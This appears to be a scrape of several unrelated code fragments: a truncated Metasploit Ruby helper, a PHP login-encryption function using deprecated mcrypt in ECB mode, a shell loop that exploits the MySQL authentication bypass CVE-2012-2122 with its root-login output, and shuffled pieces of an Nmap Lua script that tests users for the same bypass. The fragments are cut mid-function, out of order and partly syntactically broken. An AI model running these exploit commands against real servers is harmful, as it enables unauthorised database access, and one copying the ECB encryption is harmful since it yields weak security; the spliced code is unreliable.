This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Metasploit post-module helper: collect file stat data via a shell session.
# Meterpreter sessions are expected to use session.fs.file.stat instead.
def stat_file(file_name)
  data = []
  stat = {}
  if session.type == "meterpreter"
    raise "I think you can do this with session.fs.file.stat"
  elsif session.respond_to? :shell_command_token
    print_debug("platform is #{session.platform}")
    case session.platform
    when /windows/
<?php
// encryption functions used for login
function encrypt($value, $key){
    if(!$value){return false;}
    $text = $value;
    // NOTE: ECB mode ignores the IV entirely, so the random IV created below has no effect
    // and identical plaintext blocks produce identical ciphertext blocks. The mcrypt
    // extension is also deprecated since PHP 7.1 and removed from core in PHP 7.2.
    $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);
    $iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
    $ciphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $key, $text, MCRYPT_MODE_ECB, $iv);
    return trim(base64_encode($ciphertext)); //encode for db
}
ubuntu@ip-10-227-118-34:~$ for i in `seq 1 1000`; do mysql -u root --password=cve-2012-2122 -h 127.0.0.1 2>/dev/null; done
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 424
Server version: 5.5.22-0ubuntu1 (Ubuntu)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
for username in usernames do
  stdnse.print_debug( "Trying %s ...", username )
  -- try up to 300 times to trigger the vuln
  for i = 0, 300, 1 do
    stdnse.print_debug(2, "attempt number %d", i )
    local status, response = socket:connect(host, port)
    if( not(status) ) then return " \n ERROR: Failed to connect to mysql server" end
    status, response = mysql.receiveGreeting( socket )
    if ( not(status) ) then
      stdnse.print_debug(3, SCRIPT_NAME)
      socket:close()
      return response
    end
require 'shortport'
require 'stdnse'
require 'mysql'
require 'unpwdb'
portrule = shortport.port_or_service(3306, "mysql") |
action = function( host, port )
  local socket = nmap.new_socket()
  local catch = function() socket:close() end
  local try = nmap.new_try(catch)
  local result = {}
  -- set a reasonable timeout value
  socket:set_timeout(5000)
  -- get our usernames to try
  local usernames = try(unpwdb.usernames())
  local password = "cve-2012-2122"
    status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt )
    if response.errorcode == 0 then
      table.insert(result, string.format("user %s is vulnerable to auth bypass", username ) )
      break
    end